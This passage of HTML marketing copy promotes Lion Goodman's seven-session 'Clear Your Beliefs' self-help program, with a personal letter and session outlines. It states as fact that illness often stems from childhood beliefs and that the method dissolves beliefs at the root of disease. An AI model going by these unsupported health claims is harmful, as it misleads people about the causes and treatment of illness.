do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\n\n&nbsp;\n<h1>Upgrade Your Human Operating System</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\n\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\n<div class="icon_box bullets">\n<ul class="two-col">\n	<li><strong><em>I''m not enough.</em></strong></li>\n	<li><strong><em>I can''t do it.</em></strong></li>\n	<li><strong><em>I''m not worthy.</em></strong></li>\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\n	<li><strong><em>I''m all alone.</em></strong></li>\n</ul>\n<ul class="two-col rt">\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\n</ul>\n</div>\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\n\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\n\n<strong>Here''s the good news:</strong> <strong><span style="color: #333399;">Every belief, no matter how deep, can be pulled up for examination, and changed. Simply and easily.</span></strong>\n\n&nbsp;\n<h1>The Garden Of Your Mind</h1>\n\n<p style="text-align: left;"><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1.jpg"><img class=" wp-image-246 alignright" style="margin-left: 20px; margin-right: 20px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain-tree1-300x300.jpg" alt="brain-tree" width="150" height="150" /></a> When you build a new garden, you begin by clearing the ground, removing rocks and weeds. Then you amend the soil and install a watering system so your plants will thrive. Only THEN do you plant the fruits, vegetables and flowers you want to grow and enjoy.<br /><br />\n\nThe same thing is true in your subconscious mind:\n\n<strong>First clear the old beliefs out of the way, THEN install new, empowering beliefs you want to enjoy.</strong><br /><br />\n\n<strong>It''s that simple.</strong></p>\n\n\n<h1>Beliefs Reside In The Subconscious Mind</h1>\n<div class="parg-text"><p style="text-align: left;">If you want to change your beliefs, you have to work with them<em> where they live</em>. <strong>Your conscious mind isn''t the right tool for making changes in your subconscious</strong> – it''s like tilling the garden with a screwdriver.</p>\n<p style="text-align: left;"><img class=" wp-image-323 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/water-300x201.jpg" alt="water-300x201" width="179" height="119" />To pull old beliefs out by the root, you need an effective method that dives down to the core of your psyche – deeper than words can go, deeper than talk therapy, or weekend workshops.</p>\nWhen you make changes in your subconscious mind directly, change is permanent. <strong>You become different. Life becomes different.</strong></p>\n\n<div class="parg-text"><p>A shift at the core of the psyche expands out like a pebble''s wave in a still pond – effortlessly and easily. <strong>The new beliefs you choose simply manifest – without repetition, resistance or struggle.</strong></p></div>\n\n<h1>Beliefs Are The Lens Through Which You See The World</h1>\n<div class="parg-text"><p><strong><em>How you see yourself</em> </strong>is determined by your beliefs - most of which were indoctrinated into you.</p>\n\n<div class="parg-text"><p><em><strong>How you view others </strong></em>is colored by your beliefs about them.</p>\n\n<div class="parg-text"><p><img class=" wp-image-322 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/glasses1-300x256.jpg" alt="glasses1-300x256" width="164" height="140" /><strong><em>Your experience of the world </em></strong>is shaped (and often distorted) by your beliefs. <em><strong>Your entire life experience</strong> </em>is constructed by the beliefs you''ve accumulated since you were an infant.</p>\n\n<div class="parg-text"><p>Change the lens of your beliefs, and you''ll change <strong>both</strong> your perception <strong><span style="text-decoration: underline;">and</span></strong> your experience. <strong>Change your beliefs, and your circumstances and your possibilities will also change.</strong></p>\n\n<div class="parg-text"><p><strong> <span style="color: #000080;">It''s that simple.</span></strong></p></div></div></div></div>\n\n&nbsp;\n<h1>Why Beliefs Are Difficult To Change</h1>\n<div class="parg-text"><p>Many people agree that, <em>"Your beliefs create your reality," </em>and tell you to "<em>Just change your beliefs!</em>" Few offer specific tools that will change your beliefs <em>permanently</em>. There''s a good reason: <strong>Beliefs </strong><strong>reside in your subconscious mind </strong>– below the level of conscious awareness.</p></div>\n\n<div class="parg-text"><p><strong>When you were young, your parents and caregivers indoctrinated you with their beliefs</strong>. It began when you were an infant, before you could speak. Those indoctrinated beliefs are buried deep in your pre-verbal memory. Most methods can''t reach the basement where they''re stored.</p></div>\n\n<div class="parg-text"><p>Your parents and caregivers indoctrinated you for a good reason: they wanted you to survive and thrive. Their beliefs allowed <em>them</em> to survive, so they wanted you to have those beliefs, too – whether they were a good fit for you or not. They didn''t know any better. it''s exactly what <em>their parents</em> did to<em> them</em>.</p></div>\n\n<div class="parg-text"><p>You formed your <strong>self-view</strong> and <strong>world-view</strong> from those indoctrinated beliefs, unconsciously. You didn''t know any better at the time, and you rarely questioned it. It was just "what was so."</p></div>\n\n&nbsp;\n<h1>Why We React The Way We Do</h1>\n<div class="parg-text"><p>When you <strong>react</strong> to someone or something, you''re seeing old beliefs at work. You may ask yourself afterwards:</p></div>\n\n<div class="parg-text"><p><img class="alignleft wp-image-298" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/react1-300x217.jpg" alt="react" width="187" height="135" /></p></div>\n\n<p><ul class="indented-img-left"><br />\n	<li>Why did I say that?</li>\n	<li>What''s wrong with me?</li>\n	<li>Why didn''t I follow through?</li>\n	<li>Why did I react that way?</li>\n	<li>What the hell just happened?</li>\n</ul></p>\n<em>\n<div class="parg-text"><p>"Sudden Reaction Syndrome"</em> can be traced back to the beliefs buried deep in your subconscious mind. Whenever your early childhood beliefs get triggered, the old pattern of reaction jumps up and hijacks your logical, adult mind.</p></div>\n\n<div class="parg-text"><p>These programs are like mousetraps in your mind''s basement. They lie quietly until someone steps on them. Then they snap, and take control. You suddenly react. Your responses and behavior are suddenly out of your own conscious control.</p></div>\n\n<div class="parg-text"><p><strong>You can change these reactive patterns – if you''re willing to clean out your basement.</strong></p></div>\n\n&nbsp;\n<h1>Why Most Belief-Change Methods Don''t Work</h1>\n<div class="parg-text"><p><strong>Here''s a test for any method of changing beliefs: Did the problem go away completely?</strong> Did it stay away? Or did it return?</p></div>\n\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1.jpg"><img class="alignright  wp-image-248" src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/eye1-300x225.jpg" alt="eye" width="179" height="134" /></a>Every method works for some people, some of the time. If you can use it to create permanent change, it''s a good methodology for you. But most methods create only temporary relief. Beliefs return, and cause the same problem again and again. </p></div><p><strong>Here''s why:</strong></p>\n<ul class="indented">\n	<li><span style="color: #333399;"><strong>Affirmations</strong> </span>are new beliefs you want to install. You can say them all day long, but they don''t change anything at the subconscious level. Repeating them over and over is like stomping on weeds, hoping they go away on their own. Affirmations make you feel better in the short term, but the feelings fade quickly – because the previous beliefs haven''t been eliminated from the subconscious.</li>\n	<li><span style="color: #333399;"><strong>That Belief Isn''t True.</strong> </span> Many methods help you recognize that an old belief isn''t true anymore. Techniques like Byron Katie''s <em>The Work</em> free you at the conscious level, but they don''t clear the causal level, where beliefs are stored in the subconscious mind.</li>\n	<li><span style="color: #333399;"><strong>Tap Your Problem Away. </strong> </span>Many techniques use muscle testing or tapping (e.g., EFT) to shift your attention and energy. They may remind you to love yourself just the way you are (which is good advice!). At the moment you tap or test, your blocked energy is freed, and you can move forward. But too often, you meet those same negative beliefs further down the road.</li>\n</ul>\n<div class="parg-text"><p>Most belief-change methodologies have the same result – the old beliefs pop up again later. The process didn''t create permanent change. <strong>The problem isn''t you! The problem is with the method – it was only partially effective!</strong></p></div>\n\n&nbsp;\n<h1>Here''s Some Good News</h1>\n<ul class="indented">\n	<li><strong><strong><strong><span style="color: #000080;">First:</span> It''s not your fault. There''s nothing wrong with you.</strong></strong></strong></li>\n	<li><strong><span style="color: #000080;">Second:</span> You <span style="text-decoration: underline;">can</span> change your beliefs <em>permanently</em>.</strong></li>\n</ul>\n<div class="parg-text"><p>To get real, lasting change, you need to use a process that pulls your limiting and negative beliefs out by the<em> roots</em>. Otherwise, they''ll pop up later and create the same problem – again and again.</p></div>\n\n<div class="parg-text"><p>You can now <em><strong>Clear Your Beliefs – </strong></em><strong>permanently</strong>.</p></div>\n\n<h1>Imagine The Life You Desire</h1>\n<div class="parg-text"><p><strong>Can you imagine this?</strong></p>\n\n<img class="alignleft wp-image-296" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/mother-daughter2-300x200.jpg" alt="mother-daughter" width="197" height="131" />\n\n	<p>You''re no longer held back by old beliefs and stories.</p>\n	<p>There''s no resistance to doing what needs to be done.</p>\n	<p>You feel joy and positive energy as you move forward to create the life of your dreams.</p>\n\n&nbsp;\n<h1>Want To Manifest? Begin With A Mind Makeover</h1>\n <div class="parg-text"><p><strong><em>Manifestation</em> is the process of envisioning what you want, and then doing whatever is necessary to turn it into a reality. </strong></p>\n\n<div class="parg-text"><p><img class="alignright wp-image-756" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/shell1-300x200.jpg" alt="shell" width="188" height="125" />However, whenever you start a new project, or attempt to create something new, your old beliefs jump up and offer their unwanted advice: <em>"You''ll never accomplish that." "No one would pay money for it!" "Who do you think you are?"</em></p>\n\n<div class="parg-text"><p>Those discouraging words often stop us from moving forward. You need a way to clear those voices – because they WILL come up – it''s inevitable. It''s how beliefs work.</p>\n\n<div class="parg-text"><p><em><strong>Clear Your Beliefs</strong></em> is a completely new approach to solving this problem. The process is easy to learn, and easy to do.<strong> It changes beliefs at the core of the psyche, so they never return.</strong></p>\n\n&nbsp;\n<h1>Clear Whatever Is In The Way</h1>\n<div class="parg-text"><p><img class="alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/puddle1-300x300.jpg" alt="puddle" width="146" height="146" />You can finally remove those pesky blocks and barriers that keep getting in your way. Using a powerful (and fun) guided imagery process, you''ll be guided to reach down into your subconscious mind to the source of your old beliefs. When you delete them from here, they don''t come back. Old thoughts, doubts, and fears simply disappear – for good. Your life changes. You can create what you want, without interference.</p>\n\n<div class="parg-text"><p><strong>The<em> Clear Your Beliefs process</em> frees you </strong>from unwanted negative voices and experiences by dissolving emotional and somatic anchors that hold your negative beliefs in place. <strong>As a result, you have more of the experiences you want, and fewer of the experiences you <em>don''t</em> want.</strong></p></div>\n\n&nbsp;\n<h1>Is This A Guaranteed Cure-All?</h1>\n<div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol.jpg"><img class="alignright  wp-image-877" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/praying-to-Sol-225x300.jpg" alt="praying to Sol" width="129" height="172" /></a>Unfortunately, no. There are no magic bullets that can remove your suffering instantly and magically. We use words like "<em>You can create the life of your dreams...</em>" to tell you what you CAN achieve, if you do the work.</p>\n\n<div class="parg-text"><p>No technique can cure your ills or transform your life if you don''t use it. It takes work and dedication on your part. As miraculous as this process is, there are no free rides.</p>\n\n<div class="parg-text"><p>During the past ten years, thousands of clients have used this technique to clear almost every type of problem and issue known to humans. When you place your attention on the source, at the causal level, down where your beliefs are stored, you can clear your earliest, pre-verbal programs. It takes some work, and it''s <em>very </em>effective.</p></div>\n\n&nbsp;\n<h1>The Clear Your Beliefs program can:</h1>\n<ul class="indented">\n	<li>Eliminate blocks, resistance, and fears that have prevented you from showing up authentically and fulfilling your purpose.</li>\n	<li>Remove the cold, wet blanket that your parents, teachers, and society threw over you (and your dreams) when you were young.</li>\n	<li>Give you the power to change your experiences – and your circumstances – at will.</li>\n	<li>Show you how to gain mastery over your moods, perceptions, and responses.</li>\n</ul>\n&nbsp;\n<h1>How the <em>Clear Your Beliefs </em>Program Shifts Your Life</h1>\n <div class="parg-text"><p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected.jpg"><img class="alignleft wp-image-962 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/lotus-flower-reflected-300x225.jpg" alt="lotus flower reflected" width="180" height="135" /></a>During the 7-week <em>Clear Your Beliefs</em> program, all aspects of you – mental, emotional, physical, and spiritual – are invited to work together to transform your psychological <em>set point</em> – the inner structure of your personality that formed during your first years of life.</p></div>\n\n <div class="parg-text"><p>If you''re ready to remove limitations that have held you back, and create the life of your dreams, join us for this 7-part program skillfully led by Lion Goodman, creator of the <em>BeliefCloset Process<strong>. </strong></em></p></div>\n\n <div class="parg-text"><p>During each class, you''ll uproot subconscious beliefs that have interfered with your success, happiness and personal freedom. You''ll upgrade your health, your work, and your relationships. You''ll examine and eliminate beliefs that were programmed into you about yourself, other people, and the world.</p></div>\n\n <div class="parg-text"><p>If you''re purchasing this program as a part of a Clear Your Beliefs Coaching package, your Coach will meet with you once each week (or as you''ve arranged) to follow up on the work you did with the recorded class.  He or she will help you go deeper than you could possibly go with a recorded class, or on your own.  He or she will guide you carefully into the depths of your subconscious beliefs, and make this program even more effective.</p></div>\n<div class="icon_box">\n<h1>With This Methodology, You Can Finally:</h1>\n<ul class="check">\n	<li>Manifest your dreams and your life purpose<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway.jpg"><img class=" wp-image-317 alignright" style="" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/stone-doorway-220x300.jpg" alt="stone-doorway" width="150" height="205" /></a></li>\n	<li>Remove resistance and barriers</li>\n	<li>Open doors to new opportunities</li>\n	<li>Eliminate pain and suffering from the past</li>\n	<li>Experience more fulfillment in your relationships</li>\n	<li>Attract more abundance and prosperity</li>\n	<li>Increase your energy, vitality, and productivity</li>\n</ul>\n</div>\n <div class="parg-text"><p><strong>You''ll step more fully into living as the magnificent, radiant being you already are</strong> (and eliminate the fear of doing so!).</p></div>\n\n&nbsp;\n<div class="message_box">\n<h1>A Message from Lion Goodman...</h1>\n<div class="mb-img">\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg"><img class="alignleft wp-image-384 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/04/lion-full1.jpg" alt="lion-full1" width="171" height="236" /></a></div>\n<p>Dear Explorer:</p>\n<p>As a child, I believed there was something wrong with me. I didn''t look or feel like the other kids. I didn''t like who I was. I felt separate and alone. I didn''t know how to make it better.</p>\n\n<p>I was gripped by some of life''s biggest questions: "Who am I? Why am I here? What makes me different? What is life about?"</p>\n\n<p>I began to search for answers, learning everything I could, hoping someday I would figure it all out, and finally become normal and accepted. (Fortunately, the "normal" part never happened!)</p>\n\n<p>After decades of studying psychology, neurology, philosophy, history, religions, and engaging in therapy, workshops, and spiritual practices, I found answers to most of my questions.</p>\n\n<p>I noticed that whenever my life changed for the better, there had been shifts in my beliefs: When I changed my beliefs about myself, I became happier and more successful. When I changed my beliefs about others, my relationships improved. When I shifted my beliefs about the world and it''s possibilities, new opportunities came my way.</p>\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1.jpg"><img class=" wp-image-295 alignright" style="margin-top: 5px; margin-bottom: 5px;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/studied1-289x300.jpg" alt="studied" width="198" height="206" /></a>The most powerful leverage for success turned out to be <em><strong>my beliefs</strong></em>. So I searched for ways to change beliefs directly. I wanted a method that worked consistently, and transformed beliefs permanently.</p>\n\n<p>The belief-change methods I studied turned out to be only partially effective. I asked Source to help me with this dilemma. And one day, I received a divine gift: a "download" – a way to delete beliefs easily and permanently by engaging the subconscious mind in a playful way. I called it <em>The BeliefCloset Process<strong>®</strong></em> because it used the colorful metaphor of <em>clothing in your closet</em> to represent <em>beliefs in your subconscious mind</em>.</p>\n\n<p>When your closet is crammed full of old outfits you''ll never wear, it''s time for some Spring cleaning!</p>\n\n<p><em>The BeliefCloset Process</em> turned out to be much more than a belief-delete button. It''s a method for <strong>healing deep psychological wounds.</strong></p>\n\n<p>Having worked with thousands of clients over the past decade, I''ve watched profound change echo through their lives, lightening their burdens and creating a brighter future. During the past decade, I''ve taught this methodology to hundreds of coaches, therapists and healers in 18 countries around the world. Testimonials from clients pour in, expressing deep gratitude for the ability to clear long-standing problems that other methods haven''t touched.</p>\n\n<p>I am grateful to have brought it through. Now I want to share it with you. In the <strong><em>Clear Your Beliefs </em></strong>program, you''ll use the <em>BeliefCloset Process </em>to shift beliefs that no longer serve you. <a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1.jpg"><img class=" wp-image-253 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/key1-220x300.jpg" alt="key" width="151" height="207" /></a>Your old programs might be creating a mess in your relationship with your partner, or your children. They might be limiting your business or financial success. Your beliefs about work may be making you unhappy, or your beliefs about your body may be impacting your health.</p>\n\n<p>If you feel limited or stuck in any part of your life, there are beliefs underneath those feelings – and you can change them.</p>\n\n<p>A lot of people say, "just change your beliefs..." as if it were easy. The truth is, it takes the right technique, applied in the right way, along with the right guidance.</p>\n\n<p>In the <em>Clear Your Beliefs</em> course, you''ll get guidance from me, through a series of recorded classes. If you''re registering as a part of a Clear Your Beliefs Coaching package, you''ll work with your professional <em>Clear Your Beliefs Coach </em>in private sessions to follow up on your work with each recording.  You''ll experience seven sessions of deep healing and transformation, then go deeper with your coach each week. Clear your old beliefs, and create the life you want.</p>\n\n<p>This is <em>true self-empowerment</em>. Decide what you want, and how you want to live. Then go out and make it so. Use the process to clear whatever gets in your way. Your light will shine more brightly, and new possibilities will open.</p>\n\n<p>Live the life of your dreams. There''s nothing to stop you – except a few old beliefs...</p>\n\n<p>In gratitude, and with warm wishes for your total success,</p>\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png"><img class="alignnone  wp-image-490 no-shad" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/lion-signature-300x70.png" alt="lion-signature-300x70" width="377" height="87" /></a>\n\n<p>Lion Goodman, Creator of <em>The BeliefCloset Process</em></p>\n\n</div>\n&nbsp;\n<h1>Register Today and Discover What''s Possible</h1>\n <div class="parg-text"><p>We are delighted to offer you this empowering program, which thousands of people from around the world have successfully completed. You''ll receive <strong>seven 90-minute recorded sessions</strong>, which you can listen to at your convenience, and if you''ve registered for a coaching package, you''ll go deeper each week with your coach. You''ll learn about beliefs and how to change them with the <em>BeliefCloset Process</em>, a powerful methodology used by hundreds of coaches and therapists around the world.</p></div>\n\n&nbsp;\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 1:   </span><strong>Pull All the Old Junk Out of Your BeliefCloset®</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1.jpg"><img class=" wp-image-309 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/mod1-199x300.jpg" alt="mod1" width="130" height="212" /></a>When you begin Spring cleaning, the first step is that dreaded moment when you open the door to your closet, and realize that you have to take everything <strong>out</strong> in order to begin the sorting process, before you can decide what to keep and what to toss.</p>\n\n<p>In this first session, you''ll examine your old beliefs, and determine which ones no longer serve you.  It''s time to discard them and clear some space!  You''ll get your first in-depth experience with the <em>BeliefCloset Process</em> and discover that you can permanently delete a belief from your past – even beliefs that have been annoying you for decades.  You''ll feel more open, empowered and free to choose your beliefs and the way you live your life.</p>\n\n</div>\n<div class="module_body">\n\n<strong> In Session 1, you will:</strong>\n<ul>\n	<li>Discover old limiting beliefs that are deeply buried in your subconscious mind</li>\n	<li>Learn which ones keep you stuck, preventing you from having what you want in life</li>\n	<li>Experience a process that returns you to your True Self, the home of inner joy and bliss</li>\n	<li>Begin to work with, not against, your subconscious mind – where your beliefs reside</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 2:   </span><strong>Clear Your Negative Beliefs About Who You Are</strong></h5>\n</div>\n<div class="module_body">\n\n<p><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2.jpg"><img class=" wp-image-375 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess2-300x199.jpg" alt="sess2" width="194" height="128" /></a>In the 2nd module, you''ll focus on issues and problems that have kept you from being happy and joyful.</p>\n\n<p>What do you believe about yourself? Your idea of "Who I am" is based on beliefs and programming you got as a child.  What messages did your parents, caregivers, and siblings plant in your child brain that still affect you? In the BeliefCloset, keeping your old beliefs about who you are is akin to keeping all of your infant clothes (including those smelly diapers!) in your closet.  It''s time to haul them out, and toss them out! You don''t need them anymore.  If you hear critical inner voices berating you, don''t miss this session.  Rid yourself of those pesky critical voices along with the diapers!</p>\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 2, you will:</strong>\n<ul>\n	<li>Use the <em>BeliefCloset Process</em> to get underneath negative feelings about yourself</li>\n	<li>Clear old, limiting beliefs about who you are, and what you deserve, so you can enjoy life again</li>\n	<li>See your own magnificence through a new clear lens of your own beauty and joy</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 3:  </span><strong>Clear Your Limiting Beliefs About What You Are Capable Of</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3.jpg"><img class=" wp-image-311 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess3-300x200.jpg" alt="sess3" width="206" height="137" /></a>Your abilities are limited only by your beliefs. If someone else can do it, so can you.\n\nThis isn''t a magic pill – you still have to learn skills and practice them – but the only thing in your way is your old beliefs.\n\n<em>What are you capable of?  </em>If your answer is "Anything..." you don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista 